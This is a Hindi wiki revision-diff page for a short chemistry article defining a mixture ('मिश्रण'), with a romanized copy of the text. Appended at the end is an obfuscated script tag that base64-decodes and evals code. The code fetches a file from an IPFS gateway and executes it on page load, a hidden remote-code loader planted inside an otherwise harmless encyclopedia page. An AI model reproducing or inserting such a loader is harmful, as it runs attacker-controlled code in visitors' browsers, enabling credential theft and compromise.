Difference between revisions of "मिश्रण"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
 
Line 1: Line 1:
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Mixture) [[रसायन विज्ञान]] में वह [[पदार्थ]] जो दो या दो से अधिक [[तत्व|तत्त्वों]] या [[यौगिक|यौगिकों]] के किसी भी अनुपात में मिलाने से प्राप्त होता है, मिश्रण कहलाता है। इसे सरल यांत्रिक विधि द्वारा पुनः प्रारंभिक अवयवों में प्राप्त किया जा सकता है। जैसे- [[हवा]]।
+
([[अंग्रेज़ी भाषा|अंग्रेज़ी]]:Mixture) [[रसायन विज्ञान]] में वह [[पदार्थ]] जो दो या दो से अधिक [[तत्व|तत्त्वों]] या [[यौगिक|यौगिकों]] के किसी भी अनुपात में मिलाने से प्राप्त होता है, मिश्रण कहलाता है। इसे सरल यांत्रिक विधि द्वारा पुनः प्रारंभिक अवयवों में प्राप्त किया जा सकता है। जैसे- हवा।
 
==प्रकार==
 
==प्रकार==
 
*[[समांग मिश्रण]]
 
*[[समांग मिश्रण]]
Line 5: Line 5:
 
{{प्रचार}}
 
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=  
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 
+
==संबंधित लेख==
 
+
{{रसायन विज्ञान}}
 
 
 
[[Category:रसायन विज्ञान]]
 
[[Category:रसायन विज्ञान]]
 
[[Category:विज्ञान_कोश]]
 
[[Category:विज्ञान_कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 06:15, 9 November 2011

(aangrezi:Mixture) rasayan vijnan mean vah padarth jo do ya do se adhik tattvoan ya yaugikoan ke kisi bhi anupat mean milane se prapt hota hai, mishran kahalata hai. ise saral yaantrik vidhi dvara punah praranbhik avayavoan mean prapt kiya ja sakata hai. jaise- hava.

prakar


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>